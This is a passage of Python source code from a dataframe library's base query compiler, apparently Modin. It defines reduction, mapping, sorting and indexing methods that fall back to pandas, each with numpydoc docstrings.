compatibility purpose. 
Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with reset index.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.reset_index)(self, **kwargs)\n\n def set_index_from_columns(\n self, keys: List[Hashable], drop: bool = True, append: bool = False\n ):\n \"\"\"\n Create new row labels from a list of columns.\n\n Parameters\n ----------\n keys : list of hashable\n The list of column names that will become the new index.\n drop : bool, default: True\n Whether or not to drop the columns provided in the `keys` argument.\n append : bool, default: True\n Whether or not to add the columns in `keys` as new levels appended to the\n existing index.\n\n Returns\n -------\n BaseQueryCompiler\n A new QueryCompiler with updated index.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.set_index)(\n self, keys=keys, drop=drop, append=append\n )\n\n # END Abstract reindex/reset_index\n\n # Full Reduce operations\n #\n # These operations result in a reduced dimensionality of data.\n # Currently, this means a Pandas Series will be returned, but in the future\n # we will implement a Distributed Series, and this will be returned\n # instead.\n\n def is_monotonic_increasing(self):\n \"\"\"\n Return boolean if values in the object are monotonicly increasing.\n\n Returns\n -------\n bool\n \"\"\"\n return SeriesDefault.register(pandas.Series.is_monotonic_increasing)(self)\n\n def is_monotonic_decreasing(self):\n \"\"\"\n Return boolean if values in the object are monotonicly decreasing.\n\n Returns\n -------\n bool\n \"\"\"\n return SeriesDefault.register(pandas.Series.is_monotonic_decreasing)(self)\n\n @doc_utils.doc_reduce_agg(\n method=\"number of non-NaN values\", refer_to=\"count\", extra_params=[\"**kwargs\"]\n )\n def count(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.count)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"maximum value\", refer_to=\"max\", extra_params=[\"skipna\", \"**kwargs\"]\n )\n def max(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.max)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"mean value\", refer_to=\"mean\", extra_params=[\"skipna\", \"**kwargs\"]\n )\n def mean(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.mean)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"minimum value\", refer_to=\"min\", extra_params=[\"skipna\", \"**kwargs\"]\n )\n def min(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.min)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"production\",\n refer_to=\"prod\",\n extra_params=[\"**kwargs\"],\n params=\"axis : {0, 1}\",\n )\n def prod(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.prod)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"sum\",\n refer_to=\"sum\",\n extra_params=[\"**kwargs\"],\n params=\"axis : {0, 1}\",\n )\n def sum(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.sum)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"to_datetime\")\n def to_datetime(self, *args, **kwargs):\n \"\"\"\n Convert columns of the QueryCompiler to the datetime dtype.\n\n Parameters\n ----------\n *args : iterable\n **kwargs : dict\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with all columns converted to datetime dtype.\n \"\"\"\n return SeriesDefault.register(pandas.to_datetime)(self, *args, **kwargs)\n\n # END Abstract full Reduce 
operations\n\n # Abstract map partitions operations\n # These operations are operations that apply a function to every partition.\n def abs(self):\n \"\"\"\n Get absolute numeric value of each element.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with absolute numeric value of each element.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.abs)(self)\n\n def applymap(self, func):\n \"\"\"\n Apply passed function elementwise.\n\n Parameters\n ----------\n func : callable(scalar) -> scalar\n Function to apply to each element of the QueryCompiler.\n\n Returns\n -------\n BaseQueryCompiler\n Transformed QueryCompiler.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.applymap)(self, func=func)\n\n # FIXME: `**kwargs` which follows `numpy.conj` signature was inherited\n # from ``PandasQueryCompiler``, we should get rid of this dependency.\n # (Modin issue #3108)\n def conj(self, **kwargs):\n \"\"\"\n Get the complex conjugate for every element of self.\n\n Parameters\n ----------\n **kwargs : dict\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with conjugate applied element-wise.\n\n Notes\n -----\n Please refer to ``numpy.conj`` for parameters description.\n \"\"\"\n\n def conj(df, *args, **kwargs):\n return pandas.DataFrame(np.conj(df))\n\n return DataFrameDefault.register(conj)(self, **kwargs)\n\n # FIXME:\n # 1. This function takes Modin Series and DataFrames via `values` parameter,\n # we should avoid leaking of the high-level objects to the query compiler level.\n # (Modin issue #3106)\n # 2. Spread **kwargs into actual arguments (Modin issue #3108).\n def isin(self, **kwargs): # noqa: PR02\n \"\"\"\n Check for each element of `self` whether it's contained in passed `values`.\n\n Parameters\n ----------\n values : list-like, modin.pandas.Series, modin.pandas.DataFrame or dict\n Values to check elements of self in.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n Boolean mask for self of whether an element at the corresponding\n position is contained in `values`.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.isin)(self, **kwargs)\n\n def isna(self):\n \"\"\"\n Check for each element of self whether it's NaN.\n\n Returns\n -------\n BaseQueryCompiler\n Boolean mask for self of whether an element at the corresponding\n position is NaN.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.isna)(self)\n\n # FIXME: this method is not supposed to take any parameters (Modin issue #3108).\n def negative(self, **kwargs):\n \"\"\"\n Change the sign for every value of self.\n\n Parameters\n ----------\n **kwargs : dict\n Serves the compatibility purpose. 
Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n\n Notes\n -----\n Be aware, that all QueryCompiler values have to be numeric.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.__neg__)(self, **kwargs)\n\n def notna(self):\n \"\"\"\n Check for each element of `self` whether it's existing (non-missing) value.\n\n Returns\n -------\n BaseQueryCompiler\n Boolean mask for `self` of whether an element at the corresponding\n position is not NaN.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.notna)(self)\n\n @doc_utils.add_refer_to(\"DataFrame.round\")\n def round(self, **kwargs): # noqa: PR02\n \"\"\"\n Round every numeric value up to specified number of decimals.\n\n Parameters\n ----------\n decimals : int or list-like\n Number of decimals to round each column to.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with rounded values.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.round)(self, **kwargs)\n\n # FIXME:\n # 1. high-level objects leaks to the query compiler (Modin issue #3106).\n # 2. remove `inplace` parameter.\n @doc_utils.add_refer_to(\"DataFrame.replace\")\n def replace(self, **kwargs): # noqa: PR02\n \"\"\"\n Replace values given in `to_replace` by `value`.\n\n Parameters\n ----------\n to_replace : scalar, list-like, regex, modin.pandas.Series, or None\n value : scalar, list-like, regex or dict\n inplace : {False}\n This parameter serves the compatibility purpose. Always has to be False.\n limit : int or None\n regex : bool or same types as `to_replace`\n method : {\"pad\", \"ffill\", \"bfill\", None}\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with all `to_replace` values replaced by `value`.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.replace)(self, **kwargs)\n\n @doc_utils.add_one_column_warning\n # FIXME: adding refer-to note will create two instances of the \"Notes\" section,\n # this breaks numpydoc style rules and also crashes the doc-style checker script.\n # For now manually added the refer-to message.\n # @doc_utils.add_refer_to(\"Series.view\")\n def series_view(self, **kwargs): # noqa: PR02\n \"\"\"\n Reinterpret underlying data with new dtype.\n\n Parameters\n ----------\n dtype : dtype\n Data type to reinterpret underlying data with.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler of the same data in memory, with reinterpreted values.\n\n Notes\n -----\n - Be aware, that if this method do fallback to pandas, then newly created\n QueryCompiler will be the copy of the original data.\n - Please refer to ``modin.pandas.Series.view`` for more information\n about parameters and output format.\n \"\"\"\n return SeriesDefault.register(pandas.Series.view)(self, **kwargs)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"to_numeric\")\n def to_numeric(self, *args, **kwargs): # noqa: PR02\n \"\"\"\n Convert underlying data to numeric dtype.\n\n Parameters\n ----------\n errors : {\"ignore\", \"raise\", \"coerce\"}\n downcast : {\"integer\", \"signed\", \"unsigned\", \"float\", None}\n *args : iterable\n Serves the compatibility purpose. Does not affect the result.\n **kwargs : dict\n Serves the compatibility purpose. 
Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with values converted to numeric dtype.\n \"\"\"\n return SeriesDefault.register(pandas.to_numeric)(self, *args, **kwargs)\n\n # FIXME: get rid of `**kwargs` parameter (Modin issue #3108).\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.unique\")\n def unique(self, **kwargs):\n \"\"\"\n Get unique values of `self`.\n\n Parameters\n ----------\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with unique values.\n \"\"\"\n return SeriesDefault.register(pandas.Series.unique)(self, **kwargs)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.searchsorted\")\n def searchsorted(self, **kwargs): # noqa: PR02\n \"\"\"\n Find positions in a sorted `self` where `value` should be inserted to maintain order.\n\n Parameters\n ----------\n value : list-like\n side : {\"left\", \"right\"}\n sorter : list-like, optional\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n One-column QueryCompiler which contains indices to insert.\n \"\"\"\n return SeriesDefault.register(pandas.Series.searchsorted)(self, **kwargs)\n\n # END Abstract map partitions operations\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.value_counts\")\n def value_counts(self, **kwargs): # noqa: PR02\n \"\"\"\n Count unique values of one-column `self`.\n\n Parameters\n ----------\n normalize : bool\n sort : bool\n ascending : bool\n bins : int, optional\n dropna : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n One-column QueryCompiler whose index labels are the unique elements of `self`\n and each row contains the number of times the corresponding value occurs in `self`.\n \"\"\"\n return SeriesDefault.register(pandas.Series.value_counts)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.stack\")\n def stack(self, level, dropna):\n \"\"\"\n Stack the prescribed level(s) from columns to index.\n\n Parameters\n ----------\n level : int or label\n dropna : bool\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.stack)(\n self, level=level, dropna=dropna\n )\n\n # Abstract map partitions across select indices\n def astype(self, col_dtypes, **kwargs): # noqa: PR02\n \"\"\"\n Convert column dtypes to the given dtypes.\n\n Parameters\n ----------\n col_dtypes : dict\n Map for column names and new dtypes.\n **kwargs : dict\n Serves the compatibility purpose. 
Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with updated dtypes.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.astype)(\n self, dtype=col_dtypes, **kwargs\n )\n\n @property\n def dtypes(self):\n \"\"\"\n Get columns dtypes.\n\n Returns\n -------\n pandas.Series\n Series with dtypes of each column.\n \"\"\"\n return self.to_pandas().dtypes\n\n # END Abstract map partitions across select indices\n\n # Abstract column/row partitions reduce operations\n #\n # These operations result in a reduced dimensionality of data.\n # Currently, this means a Pandas Series will be returned, but in the future\n # we will implement a Distributed Series, and this will be returned\n # instead.\n\n # FIXME: we're handling level parameter at front-end, it shouldn't\n # propagate to the query compiler (Modin issue #3102)\n @doc_utils.add_refer_to(\"DataFrame.all\")\n def all(self, **kwargs): # noqa: PR02\n \"\"\"\n Return whether all the elements are true, potentially over an axis.\n\n Parameters\n ----------\n axis : {0, 1}, optional\n bool_only : bool, optional\n skipna : bool\n level : int or label\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n If axis was specified return one-column QueryCompiler with index labels\n of the specified axis, where each row contains boolean of whether all elements\n at the corresponding row or column are True. Otherwise return QueryCompiler\n with a single bool of whether all elements are True.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.all)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.any\")\n def any(self, **kwargs): # noqa: PR02\n \"\"\"\n Return whether any element is true, potentially over an axis.\n\n Parameters\n ----------\n axis : {0, 1}, optional\n bool_only : bool, optional\n skipna : bool\n level : int or label\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n If axis was specified return one-column QueryCompiler with index labels\n of the specified axis, where each row contains boolean of whether any element\n at the corresponding row or column is True. Otherwise return QueryCompiler\n with a single bool of whether any element is True.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.any)(self, **kwargs)\n\n def first_valid_index(self):\n \"\"\"\n Return index label of first non-NaN/NULL value.\n\n Returns\n -------\n scalar\n \"\"\"\n return (\n DataFrameDefault.register(pandas.DataFrame.first_valid_index)(self)\n .to_pandas()\n .squeeze()\n )\n\n @doc_utils.add_refer_to(\"DataFrame.idxmax\")\n def idxmax(self, **kwargs): # noqa: PR02\n \"\"\"\n Get position of the first occurence of the maximum for each row or column.\n\n Parameters\n ----------\n axis : {0, 1}\n skipna : bool\n **kwargs : dict\n Serves the compatibility purpose. 
Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n One-column QueryCompiler with index labels of the specified axis,\n where each row contains position of the maximum element for the\n corresponding row or column.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.idxmax)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.idxmin\")\n def idxmin(self, **kwargs): # noqa: PR02\n \"\"\"\n Get position of the first occurence of the minimum for each row or column.\n\n Parameters\n ----------\n axis : {0, 1}\n skipna : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n One-column QueryCompiler with index labels of the specified axis,\n where each row contains position of the minimum element for the\n corresponding row or column.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.idxmin)(self, **kwargs)\n\n def last_valid_index(self):\n \"\"\"\n Return index label of last non-NaN/NULL value.\n\n Returns\n -------\n scalar\n \"\"\"\n return (\n DataFrameDefault.register(pandas.DataFrame.last_valid_index)(self)\n .to_pandas()\n .squeeze()\n )\n\n @doc_utils.doc_reduce_agg(\n method=\"median value\", refer_to=\"median\", extra_params=[\"skipna\", \"**kwargs\"]\n )\n def median(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.median)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.memory_usage\")\n def memory_usage(self, **kwargs): # noqa: PR02\n \"\"\"\n Return the memory usage of each column in bytes.\n\n Parameters\n ----------\n index : bool\n deep : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n One-column QueryCompiler with index labels of `self`, where each row\n contains the memory usage for the corresponding column.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.memory_usage)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"number of unique values\",\n refer_to=\"nunique\",\n params=\"\"\"\n axis : {0, 1}\n dropna : bool\"\"\",\n extra_params=[\"**kwargs\"],\n )\n def nunique(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.nunique)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"value at the given quantile\",\n refer_to=\"quantile\",\n params=\"\"\"\n q : float\n axis : {0, 1}\n numeric_only : bool\n interpolation : {\"linear\", \"lower\", \"higher\", \"midpoint\", \"nearest\"}\"\"\",\n extra_params=[\"**kwargs\"],\n )\n def quantile_for_single_value(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.quantile)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"unbiased skew\", refer_to=\"skew\", extra_params=[\"skipna\", \"**kwargs\"]\n )\n def skew(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.skew)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"standard deviation of the mean\",\n refer_to=\"sem\",\n extra_params=[\"skipna\", \"ddof\", \"**kwargs\"],\n )\n def sem(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.sem)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"standard deviation\",\n refer_to=\"std\",\n extra_params=[\"skipna\", \"ddof\", \"**kwargs\"],\n )\n def std(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.std)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"variance\", refer_to=\"var\", 
extra_params=[\"skipna\", \"ddof\", \"**kwargs\"]\n )\n def var(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.var)(self, **kwargs)\n\n # END Abstract column/row partitions reduce operations\n\n # Abstract column/row partitions reduce operations over select indices\n #\n # These operations result in a reduced dimensionality of data.\n # Currently, this means a Pandas Series will be returned, but in the future\n # we will implement a Distributed Series, and this will be returned\n # instead.\n @doc_utils.add_refer_to(\"DataFrame.describe\")\n def describe(self, **kwargs): # noqa: PR02\n \"\"\"\n Generate descriptive statistics.\n\n Parameters\n ----------\n percentiles : list-like\n include : \"all\" or list of dtypes, optional\n exclude : list of dtypes, optional\n datetime_is_numeric : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler object containing the descriptive statistics\n of the underlying data.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.describe)(self, **kwargs)\n\n # END Abstract column/row partitions reduce operations over select indices\n\n # Map across rows/columns\n # These operations require some global knowledge of the full column/row\n # that is being operated on. This means that we have to put all of that\n # data in the same place.\n\n @doc_utils.doc_cum_agg(method=\"sum\", refer_to=\"cumsum\")\n def cumsum(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.cumsum)(self, **kwargs)\n\n @doc_utils.doc_cum_agg(method=\"maximum\", refer_to=\"cummax\")\n def cummax(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.cummax)(self, **kwargs)\n\n @doc_utils.doc_cum_agg(method=\"minimum\", refer_to=\"cummin\")\n def cummin(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.cummin)(self, **kwargs)\n\n @doc_utils.doc_cum_agg(method=\"product\", refer_to=\"cumprod\")\n def cumprod(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.cumprod)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.diff\")\n def diff(self, **kwargs): # noqa: PR02\n \"\"\"\n First discrete difference of element.\n\n Parameters\n ----------\n periods : int\n axis : {0, 1}\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler of the same shape as `self`, where each element is the difference\n between the corresponding value and the previous value in this row or column.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.diff)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.dropna\")\n def dropna(self, **kwargs): # noqa: PR02\n \"\"\"\n Remove missing values.\n\n Parameters\n ----------\n axis : {0, 1}\n how : {\"any\", \"all\"}\n thresh : int, optional\n subset : list of labels\n **kwargs : dict\n Serves the compatibility purpose. 
Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with null values dropped along given axis.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.dropna)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.nlargest\")\n def nlargest(self, n=5, columns=None, keep=\"first\"):\n \"\"\"\n Return the first `n` rows ordered by `columns` in descending order.\n\n Parameters\n ----------\n n : int, default: 5\n columns : list of labels, optional\n Column labels to order by.\n (note: this parameter can be omitted only for a single-column query compiler\n representing a Series object, otherwise `columns` has to be specified).\n keep : {\"first\", \"last\", \"all\"}, default: \"first\"\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n if columns is None:\n return SeriesDefault.register(pandas.Series.nlargest)(self, n=n, keep=keep)\n else:\n return DataFrameDefault.register(pandas.DataFrame.nlargest)(\n self, n=n, columns=columns, keep=keep\n )\n\n @doc_utils.add_refer_to(\"DataFrame.nsmallest\")\n def nsmallest(self, n=5, columns=None, keep=\"first\"):\n \"\"\"\n Return the first `n` rows ordered by `columns` in ascending order.\n\n Parameters\n ----------\n n : int, default: 5\n columns : list of labels, optional\n Column labels to order by.\n (note: this parameter can be omitted only for a single-column query compiler\n representing a Series object, otherwise `columns` has to be specified).\n keep : {\"first\", \"last\", \"all\"}, default: \"first\"\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n if columns is None:\n return SeriesDefault.register(pandas.Series.nsmallest)(self, n=n, keep=keep)\n else:\n return DataFrameDefault.register(pandas.DataFrame.nsmallest)(\n self, n=n, columns=columns, keep=keep\n )\n\n @doc_utils.add_refer_to(\"DataFrame.eval\")\n def eval(self, expr, **kwargs):\n \"\"\"\n Evaluate string expression on QueryCompiler columns.\n\n Parameters\n ----------\n expr : str\n **kwargs : dict\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler containing the result of evaluation.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.eval)(\n self, expr=expr, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.mode\")\n def mode(self, **kwargs): # noqa: PR02\n \"\"\"\n Get the modes for every column or row.\n\n Parameters\n ----------\n axis : {0, 1}\n numeric_only : bool\n dropna : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with modes calculated along the given axis.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.mode)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.fillna\")\n def fillna(self, **kwargs): # noqa: PR02\n \"\"\"\n Replace NaN values using provided method.\n\n Parameters\n ----------\n value : scalar or dict\n method : {\"backfill\", \"bfill\", \"pad\", \"ffill\", None}\n axis : {0, 1}\n inplace : {False}\n This parameter serves the compatibility purpose. Always has to be False.\n limit : int, optional\n downcast : dict, optional\n **kwargs : dict\n Serves the compatibility purpose. 
Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with all null values filled.\n \"\"\"\n squeeze_self = kwargs.pop(\"squeeze_self\", False)\n squeeze_value = kwargs.pop(\"squeeze_value\", False)\n\n def fillna(df, value, **kwargs):\n if squeeze_self:\n df = df.squeeze(axis=1)\n if squeeze_value:\n value = value.squeeze(axis=1)\n return df.fillna(value, **kwargs)\n\n return DataFrameDefault.register(fillna)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.query\")\n def query(self, expr, **kwargs):\n \"\"\"\n Query columns of the QueryCompiler with a boolean expression.\n\n Parameters\n ----------\n expr : str\n **kwargs : dict\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the rows where the boolean expression is satisfied.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.query)(\n self, expr=expr, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.rank\")\n def rank(self, **kwargs): # noqa: PR02\n \"\"\"\n Compute numerical rank along the specified axis.\n\n By default, equal values are assigned a rank that is the average of the ranks\n of those values, this behaviour can be changed via `method` parameter.\n\n Parameters\n ----------\n axis : {0, 1}\n method : {\"average\", \"min\", \"max\", \"first\", \"dense\"}\n numeric_only : bool\n na_option : {\"keep\", \"top\", \"bottom\"}\n ascending : bool\n pct : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler of the same shape as `self`, where each element is the\n numerical rank of the corresponding value along row or column.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.rank)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.sort_index\")\n def sort_index(self, **kwargs): # noqa: PR02\n \"\"\"\n Sort data by index or column labels.\n\n Parameters\n ----------\n axis : {0, 1}\n level : int, label or list of such\n ascending : bool\n inplace : bool\n kind : {\"quicksort\", \"mergesort\", \"heapsort\"}\n na_position : {\"first\", \"last\"}\n sort_remaining : bool\n ignore_index : bool\n key : callable(pandas.Index) -> pandas.Index, optional\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the data sorted by columns or indices.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.sort_index)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.melt\")\n def melt(self, *args, **kwargs): # noqa: PR02\n \"\"\"\n Unpivot QueryCompiler data from wide to long format.\n\n Parameters\n ----------\n id_vars : list of labels, optional\n value_vars : list of labels, optional\n var_name : label\n value_name : label\n col_level : int or label\n ignore_index : bool\n *args : iterable\n Serves the compatibility purpose. Does not affect the result.\n **kwargs : dict\n Serves the compatibility purpose. 
Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with unpivoted data.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.melt)(self, *args, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.sort_values\")\n def sort_columns_by_row_values(self, rows, ascending=True, **kwargs): # noqa: PR02\n \"\"\"\n Reorder the columns based on the lexicographic order of the given rows.\n\n Parameters\n ----------\n rows : label or list of labels\n The row or rows to sort by.\n ascending : bool, default: True\n Sort in ascending order (True) or descending order (False).\n kind : {\"quicksort\", \"mergesort\", \"heapsort\"}\n na_position : {\"first\", \"last\"}\n ignore_index : bool\n key : callable(pandas.Index) -> pandas.Index, optional\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler that contains result of the sort.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.sort_values)(\n self, by=rows, axis=1, ascending=ascending, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.sort_values\")\n def sort_rows_by_column_values(\n self, columns, ascending=True, **kwargs\n ): # noqa: PR02\n \"\"\"\n Reorder the rows based on the lexicographic order of the given columns.\n\n Parameters\n ----------\n columns : label or list of labels\n The column or columns to sort by.\n ascending : bool, default: True\n Sort in ascending order (True) or descending order (False).\n kind : {\"quicksort\", \"mergesort\", \"heapsort\"}\n na_position : {\"first\", \"last\"}\n ignore_index : bool\n key : callable(pandas.Index) -> pandas.Index, optional\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler that contains result of the sort.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.sort_values)(\n self, by=columns, axis=0, ascending=ascending, **kwargs\n )\n\n # END Abstract map across rows/columns\n\n # Map across rows/columns\n # These operations require some global knowledge of the full column/row\n # that is being operated on. 
This means that we have to put all of that\n # data in the same place.\n @doc_utils.doc_reduce_agg(\n method=\"value at the given quantile\",\n refer_to=\"quantile\",\n params=\"\"\"\n q : list-like\n axis : {0, 1}\n numeric_only : bool\n interpolation : {\"linear\", \"lower\", \"higher\", \"midpoint\", \"nearest\"}\"\"\",\n extra_params=[\"**kwargs\"],\n )\n def quantile_for_list_of_values(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.quantile)(self, **kwargs)\n\n # END Abstract map across rows/columns\n\n # Abstract __getitem__ methods\n def getitem_array(self, key):\n \"\"\"\n Mask QueryCompiler with `key`.\n\n Parameters\n ----------\n key : BaseQueryCompiler, np.ndarray or list of column labels\n Boolean mask represented by QueryCompiler or ``np.ndarray`` of the same\n shape as `self`, or enumerable of columns to pick.\n\n Returns\n -------\n BaseQueryCompiler\n New masked QueryCompiler.\n \"\"\"\n\n def getitem_array(df, key):\n return df[key]\n\n return DataFrameDefault.register(getitem_array)(self, key)\n\n def getitem_column_array(self, key, numeric=False):\n \"\"\"\n Get column data for target labels.\n\n Parameters\n ----------\n key : list-like\n Target labels by which to retrieve data.\n numeric : bool, default: False\n Whether or not the key passed in represents the numeric index\n or the named index.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler that contains specified columns.\n \"\"\"\n\n def get_column(df, key):\n if numeric:\n return df.iloc[:, key]\n else:\n return df[key]\n\n return DataFrameDefault.register(get_column)(self, key=key)\n\n def getitem_row_array(self, key):\n \"\"\"\n Get row data for target indices.\n\n Parameters\n ----------\n key : list-like\n Numeric indices of the rows to pick.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler that contains specified rows.\n \"\"\"\n\n def get_row(df, key):\n return df.iloc[key]\n\n return DataFrameDefault.register(get_row)(self, key=key)\n\n # END Abstract __getitem__ methods\n\n # Abstract insert\n # This method changes the shape of the resulting data. 
